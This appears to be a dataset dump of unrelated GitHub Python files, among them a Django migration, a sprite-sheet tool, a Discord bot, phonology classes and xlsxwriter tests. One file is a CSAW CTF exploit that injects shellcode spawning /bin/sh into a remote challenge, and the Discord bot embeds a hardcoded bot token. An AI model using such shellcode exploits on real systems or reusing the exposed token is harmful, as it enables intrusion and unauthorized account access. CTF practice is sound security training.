dependencies = [
('todo_app', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='todoitem',
name='completed_date',
field=models.DateTimeField(null=True),
),
]
| UTF-8 | Python | false | false | 386 | py | 562 | 0002_alter_todoitem_completed_date.py | 347 | 0.588083 | 0.53886 | 0 | 18 | 20.444444 | 50 |
tori46/DeDiv | 15,693,810,545,881 | 676fe7f9ffb4f8e85e9d381e6817e26f45c9c8f9 | e75324ac6a13d5176feb62dcb6310035bae16f4b | /filter_top_scores.py | f1c0823386d01aa15cb578a8257fadf1d3990d86 | [] | no_license | https://github.com/tori46/DeDiv | f393d6fea1aca446b51d9a2ff34d9c484953c164 | 27c9cc4c06e512594ab9ac6c1b6853762a137729 | refs/heads/master | "2023-03-22T14:15:25.388100" | "2021-03-15T17:06:34" | "2021-03-15T17:06:34" | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """Filter the candidate outputs to the ones with highest likelihood score."""
import glob
import json
import csv
import editdistance
import nltk
from bert_serving.client import BertClient
from mosestokenizer import MosesDetokenizer
from sklearn.cluster import KMeans
import collections
import configargparse
import numpy as np
import os
def filter_candidates(candidates, scores, num_candidates):
"""Returns the num_candidates canadidates with the lowest scores."""
new_candidates, new_scores = [], []
sorted_by_score = sorted(zip(candidates, scores),
key=lambda x: x[1], reverse=True)
for cand, score in sorted_by_score:
if cand not in new_candidates and len(cand) > 0 and len(new_candidates) < num_candidates:
new_candidates.append(cand)
new_scores.append(score)
assert len(new_candidates) == num_candidates
return new_candidates, new_scores
def main(opt):
if not os.path.exists(opt.output_dir):
os.makedirs(opt.output_dir)
all_results = {}
for json_file in glob.glob(os.path.join(opt.input_dir, '*.json')):
out_json_file = os.path.join(opt.output_dir, os.path.basename(json_file))
## Check to make sure file doesn't already exist
if not os.path.isfile(out_json_file):
with open(json_file, 'r') as f:
try:
experiment = json.load(f)
print('Processing ' + json_file)
except:
print('Error processing ' + json_file)
print('Skipping it.')
continue
for ex_num, example in enumerate(experiment['results']):
candidates = example['pred']
scores = example['scores']
candidates, scores = filter_candidates(candidates, scores, opt.num_cands)
if ex_num < 3:
print(candidates)
print(scores)
example['pred'] = candidates
example['scores'] = scores
out_json_file = os.path.join(opt.output_dir, os.path.basename(json_file))
with open(out_json_file, 'w') as f:
json.dump(experiment, f)
else:
print("SKIPPING: " + json_file)
if __name__ == '__main__':
parser = configargparse.ArgumentParser(
description='analyze_diversity.py',
config_file_parser_class=configargparse.YAMLConfigFileParser,
formatter_class=configargparse.ArgumentDefaultsHelpFormatter)
group = parser.add_argument_group('Arguments')
group.add('--input_dir', type=str, required=True,
help='Directory containing json files.')
group.add('--output_dir', type=str, required=True,
help='Directory to write out files.')
group.add('--num_cands', type=int, default=10,
help='The target number of candidates.')
opt = parser.parse_args()
main(opt)
| UTF-8 | Python | false | false | 2,746 | py | 106 | filter_top_scores.py | 11 | 0.65732 | 0.655499 | 0 | 85 | 31.305882 | 93 |
vgmoose/Splite | 8,031,588,890,991 | e8cfd4b8b9c262c688e42350b69ccc20a5cada21 | 3c2fc3e906b1836a4c28458cf97aca2882b5f40e | /splite.py | 29573e4c53bb78ec9c8dc3716285b09e63cae5e9 | [] | no_license | https://github.com/vgmoose/Splite | 0c1eaa225674c519efa731261faf722637009038 | 78596bd3def2081fe934b3bb7f6a17bb57226c6b | refs/heads/master | "2021-01-10T02:00:16.504011" | "2016-01-19T07:04:31" | "2016-01-19T07:04:31" | 49,922,385 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import json
import sys
import os
print ".--=============--=============--."
print "| Welcome to Splite! |"
print ".--=============--=============--."
yeswords = ["yes", "y", "ya", "ok", "okay"]
try:
from PIL import Image
except:
ans = raw_input("The Python Image Library is required to continue. Install it now? ")
if ans.lower() in yeswords:
try:
os.system("sudo easy_install pip")
os.system("sudo pip install Pillow")
except:
print("Install failed. Make sure you have a working gcc compiler")
exit()
prev = []
try:
f = open(".prev", "r")
for line in f:
prev.append(line)
f.close()
except:
pass
cur = open(".prev", "w")
cur_line = 0
def to_rgb(argb):
return "".join(map(chr, argb)).encode('hex')
def sp_input(msg, default=""):
global cur_line
out = "| " + msg
old = ""
try:
old += prev[cur_line].rstrip("\n")
except:
old = default
if old != "":
out += " [" + old + "]"
out += ": "
resp = raw_input(out)
if resp == "":
resp = old
cur_line += 1
cur.write(resp+"\n")
return resp
try:
sheet = sys.argv[1]
print("| Using " + sheet)
except:
sheet = raw_input("| Path to sprite sheet: ")
tile_width = int(sp_input(" Width of tile"))
tile_height = int(sp_input("Height of tile"))
frames = int(sp_input(" Number of frames"))
names = sp_input("List of row names").replace(", ",",")
dirs = names.split(",")
#print ".--------------------------------"
#print("| Opening your sprite sheet...")
im = Image.open(sheet)
pix = im.convert('RGBA')
offsetx = 0
offsety = 0
autobg = to_rgb(pix.getpixel((offsety, offsetx)))
truebg = sp_input("Background color", autobg)
print ".--------------------------------"
print "| I'm going to take " + sheet
print "| make " + str(len(dirs)) + " folders: " + str(dirs)
print "| representing iOS / OS X image sets"
print "| with " + str(frames) + " frames each"
print "| where every frame is " + str(tile_width) + "x" + str(tile_height)
print "| and remove the background color #" + truebg
print ".--------------------------------"
ans = raw_input("| Is this correct? ")
if not ans.lower() in yeswords:
print("| I'm sorry to hear that :(")
print ".--------------------------------"
exit()
atlas_name = sp_input("Enter image atlas name")
print ".--------------------------------"
aname = atlas_name + ".spriteatlas"
print "| Making " + aname + " directory"
os.mkdir(aname)
#print "| Making " + aname + "/Contents.json"
main_content = {"info": { "version": 1, "author": "Splite" } }
outjson = open(aname + "/Contents.json", "w")
outjson.write(json.dumps(main_content, indent=4, separators=(',', ': ')))
outjson.close()
dcount = 0
for d in dirs:
print "| Processing " + d + ".imageset"
for x in range(1, frames+1):
bname = aname + "/" + atlas_name + "_" + d + "_" + str(x) + ".imageset"
# print "| Creating " + bname + " directory"
os.mkdir(bname)
sub_content = { "images" : [ { "idiom" : "universal", "filename" : "tiles-0.png", "scale" : "1x" }, { "idiom" : "universal", "scale" : "2x" }, { "idiom" : "universal", "scale" : "3x" } ], "info" : { "version" : 1, "author" : "Splite" } }
# print "| Creating " + bname + "/Contents.json"
outjson = open(bname + "/Contents.json", "w")
outjson.write(json.dumps(sub_content, indent=4, separators=(',', ': ')))
outjson.close()
# print "| Processing " + d + ".imageset: " + str(tile_width) + "x" + str(tile_height) + " frame #" + str(x)
top = dcount*tile_height
left = x*tile_width
bottom = top + tile_height
right = left + tile_width
nim = im.crop((left, top, right, bottom))
npix = nim.load()
for zy in range(0, tile_height):
for zx in range(0, tile_width):
if to_rgb(npix[zy, zx]) == truebg:
# make transparent
npix[zy, zx] = (255, 255, 255, 0)
nim.save(bname + "/tiles-0.png")
dcount += 1
print ".--=============--=============--."
print "| All Done!! |"
print ".--=============--=============--."
| UTF-8 | Python | false | false | 4,015 | py | 1 | splite.py | 1 | 0.539726 | 0.532254 | 0 | 153 | 25.24183 | 239 |
Vivenkko/Python | 11,605,001,648,730 | f70d26240212a2abf8b5c12f543496c6aa280ce9 | f613067c07773785551f1daecb1ae4727cda83a3 | /Ejercicios/Ticket de Compra/ticket.py | b12c2210716a5ca282b1daa579e605f7746a51ec | [] | no_license | https://github.com/Vivenkko/Python | e37510ea66d07fcfbfdd9ced63dc351aad40e535 | 0a908ab389875480b23b30e68ff353fbe6a377c7 | refs/heads/master | "2021-05-07T18:37:17.014265" | "2018-02-20T12:42:18" | "2018-02-20T12:42:18" | 108,816,674 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
import producto
import alimentacion
import electronica
import ropa
listaProductos = [
alimentacion('ES-SE-22314','cebolla',0.14,'11/11/2017'),
alimentacion('ES-JA-23623','botella de vino',11.55,'01/01/2038'),
alimentacion('ES-CO-12352','chuleta de cerdo',0.90,'10/11/2017'),
alimentacion('SU-SC-23145','tableta de chocolate',1.15,'10/02/2018'),
alimentacion('ES-VI-54324','queso curado de cabra',13.30,'20/0/2018'),
ropa('CH-YG-92114','vaqueros negros',19.95,'38'),
ropa('CH-BE-54628','camiseta joker',9.95,'M'),
ropa('CH-HK-13597','deportes Fila',29.95,'43'),
ropa('CH-YZ-95371','colgante Mjölnir',2.50,'12'),
ropa('CH-GH-53928','tirantes negros',11.25,'M'),
electronica('US-CA-52417','iPhone X',1350.00,'1 año'),
electronica('US-CO-74125','portátil Mountain',2150.00,'2 años'),
electronica('US-MI-95682','lcd samsung s8',250.00,'6 meses'),
electronica('US-CH-12456','microSD 1 TB',100.00,'1 año'),
electronica('US-TX-65236','usb cafetera',50.00,'8 meses')
]
print listaProductos
| UTF-8 | Python | false | false | 1,072 | py | 20 | ticket.py | 20 | 0.655108 | 0.477976 | 0 | 25 | 41.68 | 74 |
KaioAntonio/CPTBot | 6,768,868,498,737 | f1c5be6fe2d29fc0932da2f0c2bb368834a1968d | 65296a1e4dbcb71011268ea6d0a926046073cf4e | /main.py | cf8c24accd77865dd65a9e1a62738174e4aaa42c | [] | no_license | https://github.com/KaioAntonio/CPTBot | d37c0b74e926ed0d92246dd46baa928395d4b53d | 76515429ea4d52184e2408d2af94b80dd83d4b86 | refs/heads/master | "2023-08-24T19:47:19.944413" | "2021-10-17T03:02:54" | "2021-10-17T03:02:54" | 417,991,973 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import discord
client = discord.Client()
@client.event
async def on_ready():
print("O BOT ESTÁ ONLINE")
@client.event
async def on_message(message):
content = message.content.lower()
channel = message.channel
author = message.author.name
mention = message.author.mention
if(author == "CPTbot"):
return
if(content == "!play" and channel.name == "⭐𝐂𝐇𝐀𝐓"):
await channel.send("ENVIE SOMENTE NO CHAT DE MUSICA " + mention)
if (content == "bom dia" and channel.name == "⭐𝐂𝐇𝐀𝐓"):
await channel.send("bom dia " + mention)
if (content == "boa tarde" and channel.name == "⭐𝐂𝐇𝐀𝐓"):
await channel.send("boa tarde " + mention)
if (content == "boa noite" and channel.name == "⭐𝐂𝐇𝐀𝐓"):
await channel.send("boa noite " + mention)
client.run("ODk1MDYyNjM0OTk3NjE2NjYx.YVzGCQ.Yfi18iHdIKAHwV7A68lyN2we188")
| UTF-8 | Python | false | false | 938 | py | 2 | main.py | 1 | 0.645857 | 0.631101 | 0 | 31 | 27.322581 | 73 |
duraes-antonio/ResolveAE | 6,124,623,406,390 | 396983d799dae77c90cb863d191d9cb9c7396a31 | 81ac288bce5543a1760069644f89669334de1456 | /Persistencia/Scripts/micro_dao/estado.py | 812b61fd23a94364e70063fabe857cf2c497157b | [] | no_license | https://github.com/duraes-antonio/ResolveAE | 52bdcc77785ca9789614488eae0e6ae2dbd04d55 | a256346dedfcdcd972a3177c4a07896fbe4eb802 | refs/heads/master | "2020-03-26T20:44:02.577208" | "2018-12-05T23:32:41" | "2018-12-05T23:32:41" | 145,342,257 | 0 | 0 | null | false | "2018-12-02T19:42:30" | "2018-08-19T22:34:42" | "2018-12-02T13:17:52" | "2018-12-02T19:42:29" | 78,929 | 0 | 0 | 0 | Java | false | null | from micro_dao.objeto_modelo import ObjetoModelo
class Estado(ObjetoModelo):
_id: int
_nome: str
_sigla: str
def __init__(self, nome_estado: str, sigla: str):
self._id = 1
self.set_nome(nome_estado)
self.set_sigla(sigla)
def get_id(self) -> int:
return self._id
def set_id(self, id: int):
self._id = id
return self
def get_nome(self) -> str:
return self._nome
def set_nome(self, nome_estado: str):
self._nome = nome_estado
return self
def get_sigla(self) -> str:
return self._sigla
def set_sigla(self, sigla: str):
self._sigla = sigla
return self | UTF-8 | Python | false | false | 691 | py | 178 | estado.py | 153 | 0.564399 | 0.562952 | 0 | 33 | 19.969697 | 53 |
pracedru/PracedruDesign | 481,036,357,434 | d256727c26decbeef8a5b3564100a11f544ffbf5 | f3e2ac6d8b1a119233a453d3e96207cdb1b12cd6 | /GUI/Models/MarginsModel.py | 383b3488204a1c66beb20a743c92c41eb80d18dd | [
"BSD-3-Clause"
] | permissive | https://github.com/pracedru/PracedruDesign | 017071f75ee3aabe5832828f3f4d095ee7488841 | e6e313ee3efb377a8e393e5276eb9daa172e1c58 | refs/heads/master | "2021-01-20T00:10:36.038890" | "2019-03-11T09:21:55" | "2019-03-11T09:21:55" | 89,090,104 | 4 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from PyQt5.QtCore import *
from Business import *
__author__ = 'mamj'
col_header = ["Margin Name"]
class MarginsModel(QAbstractTableModel):
def __init__(self, doc):
QAbstractItemModel.__init__(self)
self._margins = doc.get_margins()
self._doc = doc
self._margins.add_change_handler(self.on_margins_changed)
def rowCount(self, model_index=None, *args, **kwargs):
return len(self._margins.get_margins())
def columnCount(self, model_index=None, *args, **kwargs):
return len(col_header)
def data(self, model_index: QModelIndex, int_role=None):
col = model_index.column()
row = model_index.row()
data = None
if int_role == Qt.DisplayRole:
margin_item = self._margins.get_margins()[row]
if col == 0:
data = margin_item.name
elif int_role == Qt.EditRole:
margin_item = self._margins.get_margins()[row]
if col == 0:
data = margin_item.name
return data
def setData(self, model_index: QModelIndex, value: QVariant, int_role=None):
col = model_index.column()
row = model_index.row()
margin_item = self._margins.get_margins()[row]
if col == 0:
margin_item.set_name(value)
return True
return False
def remove_rows(self, rows):
margins = set()
for row in rows:
margins.add(self._margins.get_margins()[row])
remove_margins(self._doc, margins)
def on_margins_changed(self, event: ChangeEvent):
self.layoutChanged.emit()
def flags(self, model_index: QModelIndex):
default_flags = Qt.ItemIsSelectable | Qt.ItemIsEnabled | Qt.ItemIsEditable
return default_flags
def headerData(self, p_int, orientation, int_role=None):
if int_role == Qt.DisplayRole:
if orientation == Qt.Vertical:
return p_int
else:
return col_header[p_int]
else:
return
def get_margins_object(self):
return self._margins
def get_margin(self, row):
return self._margins.get_margins()[row]
def get_index_from_margin(self, component):
row = self._margins.get_margins().index(component)
return self.index(row, 0)
| UTF-8 | Python | false | false | 1,990 | py | 118 | MarginsModel.py | 106 | 0.68995 | 0.687437 | 0 | 76 | 25.184211 | 77 |
aman589/2018-ctfs-chall-and-sol | 9,500,467,666,023 | bb9cd0a3fd44d6552bfd7c6609fab13abe726483 | 00691c1f887c2dc2f85d90440368e596e32b307a | /csaw18/shellcode/sol.py | f386e9cba7b0e3ca38b61e75ce95eff536f5c89d | [] | no_license | https://github.com/aman589/2018-ctfs-chall-and-sol | d11cad09447dc55062747d667b5f1393faa65bcf | 888d79243155085523899267c594028fb4208b34 | refs/heads/master | "2020-08-09T22:30:21.067835" | "2019-10-10T13:52:55" | "2019-10-10T13:52:55" | 214,190,696 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from pwn import *
import codecs
#p = process('./shellpointcode')
elf = ELF('./shellpointcode')
offset = 11
# shellcode2 = "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1"
# shellcode1 = "\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
shellcode1 = "\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
shellcode2 = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff"+"\xeb\x12"
p = remote('pwn.chal.csaw.io' ,9005)
p.recvuntil('1:')
p.sendline(shellcode1)
p.recvuntil('2:')
p.sendline(shellcode2)
p.recvuntil('node.next: ')
leak = int(p.recvline(False), 16)
payload = "A"*11
payload += p64(leak+8)
print(payload)
#payload += shellcode
p.sendline(payload)
p.recv()
p.interactive()
| UTF-8 | Python | false | false | 723 | py | 260 | sol.py | 176 | 0.695712 | 0.550484 | 0.081604 | 28 | 24.785714 | 77 |
fmpr/edward | 17,265,768,565,315 | 5aea2d1bc8f8bc4de2268d053a0a05d6fb2ba880 | c292eda0a47d00d5a6a63b401fe52fe48adc3778 | /examples/bayesian_linear_regression.py | 124ed9546ce739c8c2e4b50314e8b56a7d09db31 | [
"Apache-2.0"
] | permissive | https://github.com/fmpr/edward | 6a30636ffb1e903a975b2a60065bf863a565a3cd | dc8869fa96a3294ae0bc6223ff6b613218e105ef | refs/heads/master | "2021-01-17T20:12:58.270383" | "2016-08-05T20:04:09" | "2016-08-05T20:05:59" | 65,051,346 | 1 | 0 | null | true | "2016-08-05T21:52:31" | "2016-08-05T21:52:31" | "2016-08-05T05:50:19" | "2016-08-05T20:08:10" | 18,971 | 0 | 0 | 0 | null | null | null | #!/usr/bin/env python
"""
Bayesian linear regression using mean-field variational inference.
Probability model:
Bayesian linear model
Prior: Normal
Likelihood: Normal
Variational model
Likelihood: Mean-field Normal
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import edward as ed
import numpy as np
import tensorflow as tf
from edward.models import Variational, Normal
from edward.stats import norm
class LinearModel:
"""
Bayesian linear regression for outputs y on inputs x.
p((x,y), z) = Normal(y | x*z, lik_variance) *
Normal(z | 0, prior_variance),
where z are weights, and with known lik_variance and
prior_variance.
Parameters
----------
lik_variance : float, optional
Variance of the normal likelihood; aka noise parameter,
homoscedastic variance, scale parameter.
prior_variance : float, optional
Variance of the normal prior on weights; aka L2
regularization parameter, ridge penalty, scale parameter.
"""
def __init__(self, lik_variance=0.01, prior_variance=0.01):
self.lik_variance = lik_variance
self.prior_variance = prior_variance
self.n_vars = 2
def log_prob(self, xs, zs):
"""Return a vector [log p(xs, zs[1,:]), ..., log p(xs, zs[S,:])]."""
x, y = xs['x'], xs['y']
log_prior = -tf.reduce_sum(zs*zs, 1) / self.prior_variance
# broadcasting to do (x*W) + b (n_minibatch x n_samples - n_samples)
W = tf.expand_dims(zs[:, 0], 0)
b = zs[:, 1]
mus = tf.matmul(x, W) + b
# broadcasting to do mus - y (n_minibatch x n_samples - n_minibatch x 1)
y = tf.expand_dims(y, 1)
log_lik = -tf.reduce_sum(tf.pow(mus - y, 2), 0) / self.lik_variance
return log_lik + log_prior
def build_toy_dataset(N=40, noise_std=0.1):
ed.set_seed(0)
x = np.concatenate([np.linspace(0, 2, num=N/2),
np.linspace(6, 8, num=N/2)])
y = 0.075*x + norm.rvs(0, noise_std, size=N)
x = (x - 4.0) / 4.0
x = x.reshape((N, 1))
return {'x': x, 'y': y}
ed.set_seed(42)
model = LinearModel()
variational = Variational()
variational.add(Normal(model.n_vars))
data = build_toy_dataset()
inference = ed.MFVI(model, variational, data)
inference.run(n_iter=250, n_samples=5, n_print=10)
| UTF-8 | Python | false | false | 2,407 | py | 60 | bayesian_linear_regression.py | 53 | 0.619028 | 0.599501 | 0 | 79 | 29.468354 | 80 |
HanchengZhao/Leetcode-exercise | 18,056,042,523,560 | eb3e22ddcb708db656a75dd0dd61aac3f5cac897 | 4c20c78cf383cd40db8e3d3eee88e5f96884a1af | /486. Predict the Winner/486.predict-the-winner.py | c2ba4d9bf9f3b17a5dbe8322c3a5b8536bec658f | [] | no_license | https://github.com/HanchengZhao/Leetcode-exercise | de6c17a2c965fe0c3afc0a4c39fc0a5f8bbe8d47 | 6c780a97c956856ac94a5d0bb4c9b631e7a0677a | refs/heads/master | "2021-05-04T10:09:29.308858" | "2019-10-17T05:31:20" | "2019-10-17T05:31:20" | 50,731,817 | 7 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | #
# @lc app=leetcode id=486 lang=python3
#
# [486] Predict the Winner
#
class Solution:
def PredictTheWinner(self, nums) -> bool:
n = len(nums)
memo = [[0 for _ in range(n)] for _ in range(n)]
prefix = [0 for _ in range(n+1)]
for i in range(n):
prefix[i+1] = nums[i] + prefix[i]
# i, j indicates the start and end
# recursion also returns the max value
def subsum(i, j):
return prefix[j+1] - prefix[i]
def recursion(nums, i, j, memo):
if memo[i][j]:
return memo[i][j]
if i > j:
return 0
if i == j:
return nums[i]
if i == j - 1:
memo[i][j] = max(nums[i], nums[j])
return memo[i][j]
# either get first or the last
memo[i][j] = max(subsum(i+1, j) -
recursion(nums, i+1, j, memo) + nums[i],
subsum(i, j-1) - recursion(nums, i, j-1, memo) + nums[j])
return memo[i][j]
total = prefix[n]
first_max = recursion(nums, 0, n-1, memo)
return first_max >= total - first_max
# s = Solution()
# s.PredictTheWinner([1, 5, 233, 7])
| UTF-8 | Python | false | false | 1,259 | py | 611 | 486.predict-the-winner.py | 608 | 0.461477 | 0.440826 | 0 | 42 | 28.97619 | 86 |
LuaDist/xlsxwriter | 2,224,793,062,732 | 00ceca90e0eb4b32fbcd3d847d50cb163a1475be | a2966ab1f86668ecf3378bbe934af8fa553e83fc | /test/comparison/test_hyperlinks.py | 25253e30f956d2b65cae12f7459b96c14097ee8e | [
"MIT"
] | permissive | https://github.com/LuaDist/xlsxwriter | b332f745cf4258d77c2efcad62a2949c4f00cb9d | 21542b5d672f97ae69e0d36164bd7f67b1c532cd | refs/heads/master | "2023-06-04T14:32:08.206327" | "2014-11-01T11:16:38" | "2014-11-01T11:16:38" | 18,325,666 | 2 | 1 | null | true | "2014-11-01T11:16:39" | "2014-04-01T10:25:48" | "2014-10-08T12:12:12" | "2014-11-01T11:16:38" | 7,447 | 1 | 0 | 0 | Lua | null | null | ###############################################################################
#
# Test cases for xlsxwriter.lua.
#
# Copyright (c), 2014, John McNamara, jmcnamara@cpan.org
#
import base_test_class
class TestCompareXLSXFiles(base_test_class.XLSXBaseTest):
"""
Test file created with xlsxwriter.lua against a file created by Excel.
Tests for hyperlinks in files.
"""
def test_hyperlink01(self):
self.run_lua_test('test_hyperlink01')
def test_hyperlink02(self):
self.run_lua_test('test_hyperlink02')
def test_hyperlink03(self):
self.run_lua_test('test_hyperlink03')
def test_hyperlink04(self):
self.run_lua_test('test_hyperlink04')
def test_hyperlink05(self):
self.run_lua_test('test_hyperlink05')
def test_hyperlink06(self):
self.run_lua_test('test_hyperlink06')
def test_hyperlink07(self):
self.run_lua_test('test_hyperlink07')
def test_hyperlink08(self):
self.run_lua_test('test_hyperlink08')
def test_hyperlink09(self):
self.run_lua_test('test_hyperlink09')
def test_hyperlink10(self):
self.run_lua_test('test_hyperlink10')
def test_hyperlink11(self):
self.run_lua_test('test_hyperlink11')
def test_hyperlink12(self):
self.run_lua_test('test_hyperlink12')
def test_hyperlink13(self):
self.run_lua_test('test_hyperlink13')
def test_hyperlink14(self):
self.run_lua_test('test_hyperlink14')
def test_hyperlink15(self):
self.run_lua_test('test_hyperlink15')
def test_hyperlink16(self):
self.run_lua_test('test_hyperlink16')
def test_hyperlink17(self):
self.run_lua_test('test_hyperlink17')
def test_hyperlink18(self):
self.run_lua_test('test_hyperlink18')
def test_hyperlink19(self):
self.ignore_files = ['xl/calcChain.xml', '[Content_Types].xml', 'xl/_rels/workbook.xml.rels']
self.run_lua_test('test_hyperlink19')
def test_hyperlink20(self):
self.run_lua_test('test_hyperlink20')
| UTF-8 | Python | false | false | 2,069 | py | 152 | test_hyperlinks.py | 16 | 0.630256 | 0.589657 | 0 | 77 | 25.87013 | 101 |
seijiotsu/pavsca | 10,591,389,397,186 | f534818dd6979596c94baba3e249d4c828c03cc3 | f3a428006f21af3eb19d30620e9aaa3df241be10 | /pavsca/phonology/word.py | 28607d2425f704358c67aaaf690c2135918f8e14 | [
"MIT"
] | permissive | https://github.com/seijiotsu/pavsca | 7faf4ad7ad9dc37d332f76821825cd8238bd385a | f29cf99c4e360fb38037a66cb46b8959df4b06d4 | refs/heads/main | "2023-08-14T18:22:37.262118" | "2021-10-12T18:05:30" | "2021-10-12T18:05:30" | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from typing import List
from enum import Enum
class Stress(Enum):
Stressed = 0
Unstressed = 1
Any = 2
class Word:
def __init__(self, word: str):
"""
Takes a string such as "ak.mak" as input, and parses it
into a Word.
Currently handles the following phonemes:
- basic phonemes (e.g. p, t, k)
- aspiration (ʰ)
Currently handles manually specified syllables and syllable stress.
"""
temp = []
curr_syllable = 0
syllable = []
self.stressed_syllable = 0 # default, override if we find "'" or "ˈ" later on.
for c in word:
# Edge case: syllable marker. Increment curr_syllable
if c == '.':
curr_syllable += 1
continue
elif c == '\'' or c == "ˈ":
# This is a stressed syllable marker. The next syllable is the stressed one.
curr_syllable += 1
self.stressed_syllable = curr_syllable
continue
# Normal case: this is some sort of phoneme component.
if c == 'ʰ':
# This isn't a standalone phoneme, append to the previous
# phoneme.
temp[-1] += c
else:
# This is a standalone phoneme, add to temp.
temp.append(c)
# Add to the current syllable.
syllable.append(curr_syllable)
self.phonemes = temp
self.syllable = syllable
def get_syllables_as_list(self) -> List[List[str]]:
"""
For a word like "pac.man" we will return [['p', 'a', 'c'], ['m', 'a', n']]
"""
buckets = [[] for x in range(self.syllable[-1] + 1)]
for i, phoneme in enumerate(self.phonemes):
buckets[self.syllable[i]].append(phoneme)
return buckets
def get_stress_at_index(self, index: int) -> Stress:
if self.syllable[index] == self.stressed_syllable:
return Stress.Stressed
else:
return Stress.Unstressed
def __repr__(self) -> str:
return ''.join(self.phonemes) | UTF-8 | Python | false | false | 2,160 | py | 7 | word.py | 4 | 0.526438 | 0.5218 | 0 | 65 | 32.184615 | 92 |
minhle92/rage | 13,726,715,495,452 | 3e474251c4deae33f223f8b0156ac152db1681d0 | 6669ef2c1d54095799d69d3c4417d4ad79cd6c2c | /pathhelp.py | bdcc3f28d0200bb9a305382b066d6811111a230c | [] | no_license | https://github.com/minhle92/rage | 8fdd076986ddb4883be831fd5b58dbc1743a177a | ffbe8d62ac67c43646004f80d9e223d6405d2ed8 | refs/heads/master | "2020-06-04T21:59:49.374263" | "2014-05-20T01:06:40" | "2014-05-20T01:06:40" | 19,923,836 | 1 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | import subprocess
import sys
def pathhelp():
path = []
s = raw_input('Please input full path for where you put our folder:')
if s[-1] !="/":
s = s+"/"
path0 = "export PATH=$PATH:/"
path1 = ["tools/cutadapt-1.4.2/bin","tools/glimmer3.02/bin","tools/cufflinks-2.2.0.Linux_x86_64 2","tools/cem/bin","tools/bowtie-1.0.1","tools/samtools-0.1.19"]
p=raw_input("\nPlease enter the path for your system's bash_profile file:")
if p[-1]!="/":
p=p+"/"
fo=open(p+".bash_profile","a+")
path_bash=p+"~/.bash_profile"
for item in path1:
if not path0+s+item in fo.readlines():
subprocess.call(["echo","path0+s+item",">>","path_bash")
fo.close()
pathhelp()
| UTF-8 | Python | false | false | 734 | py | 8 | pathhelp.py | 7 | 0.576294 | 0.538147 | 0 | 22 | 32.363636 | 164 |
linuxmint/mint-common | 12,816,182,442,261 | da0120f68ad79d0ccdf16058a605fb0ebbd329a1 | b40c7cf7ca3b1d8327a19bfa47b3a19c0632bc87 | /usr/lib/python3/dist-packages/mintcommon/additionalfiles.py | 8ab213a7db2b78f837f82e06501fd7d575471ec5 | [] | no_license | https://github.com/linuxmint/mint-common | 3cc0251f706d75eb58a5be48f25486ac1162ec5a | c1620d4b57a201abe0679b4a8cbc36e59c3d8728 | refs/heads/master | "2020-04-16T00:20:29.060184" | "2020-04-14T20:49:15" | "2020-04-14T20:49:15" | 329,947 | 3 | 15 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/python3
import os
import gettext
def strip_split_and_recombine(comma_separated):
word_list = comma_separated.split(",")
out = ""
for item in word_list:
out += item.strip()
out+=";"
return out
def generate(domain, path, filename, prefix, name, comment, suffix, genericName=None, keywords=None, append=False):
os.environ['LANGUAGE'] = "en_US.UTF-8"
gettext.install(domain, path)
if append:
desktopFile = open(filename, "a")
else:
desktopFile = open(filename, "w")
desktopFile.writelines(prefix)
desktopFile.writelines("Name=%s\n" % name)
for directory in sorted(os.listdir(path)):
mo_file = os.path.join(path, directory, "LC_MESSAGES", "%s.mo" % domain)
if os.path.exists(mo_file):
try:
language = gettext.translation(domain, path, languages=[directory])
language.install()
if (_(name) != name):
desktopFile.writelines("Name[%s]=%s\n" % (directory, _(name)))
except:
pass
if comment is not None:
desktopFile.writelines("Comment=%s\n" % comment)
for directory in sorted(os.listdir(path)):
mo_file = os.path.join(path, directory, "LC_MESSAGES", "%s.mo" % domain)
if os.path.exists(mo_file):
try:
language = gettext.translation(domain, path, languages=[directory])
language.install()
if (_(comment) != comment):
desktopFile.writelines("Comment[%s]=%s\n" % (directory, _(comment)))
except:
pass
if keywords is not None:
formatted = strip_split_and_recombine(keywords)
desktopFile.writelines("Keywords=%s\n" % formatted)
for directory in sorted(os.listdir(path)):
mo_file = os.path.join(path, directory, "LC_MESSAGES", "%s.mo" % domain)
if os.path.exists(mo_file):
try:
language = gettext.translation(domain, path, languages=[directory])
language.install()
if (_(keywords) != keywords):
translated = strip_split_and_recombine(_(keywords))
desktopFile.writelines("Keywords[%s]=%s\n" % (directory, translated))
except:
pass
if genericName is not None:
desktopFile.writelines("GenericName=%s\n" % genericName)
for directory in sorted(os.listdir(path)):
mo_file = os.path.join(path, directory, "LC_MESSAGES", "%s.mo" % domain)
if os.path.exists(mo_file):
try:
language = gettext.translation(domain, path, languages=[directory])
language.install()
if (_(genericName) != genericName):
desktopFile.writelines("GenericName[%s]=%s\n" % (directory, _(genericName)))
except:
pass
desktopFile.writelines(suffix)
os.environ['LANGUAGE'] = "en_US.UTF-8"
gettext.install(domain, path)
def generate_polkit_policy(domain, path, filename, prefix, message, suffix, append=False):
os.environ['LANGUAGE'] = "en_US.UTF-8"
gettext.install(domain, path)
if append:
desktopFile = open(filename, "a")
else:
desktopFile = open(filename, "w")
desktopFile.writelines(prefix)
desktopFile.writelines("<message>%s</message>\n" % message)
for directory in sorted(os.listdir(path)):
mo_file = os.path.join(path, directory, "LC_MESSAGES", "%s.mo" % domain)
if os.path.exists(mo_file):
try:
language = gettext.translation(domain, path, languages=[directory])
language.install()
if (_(message) != message):
desktopFile.writelines("<message xml:lang=\"%s\">%s</message>\n" % (directory, _(message)))
except:
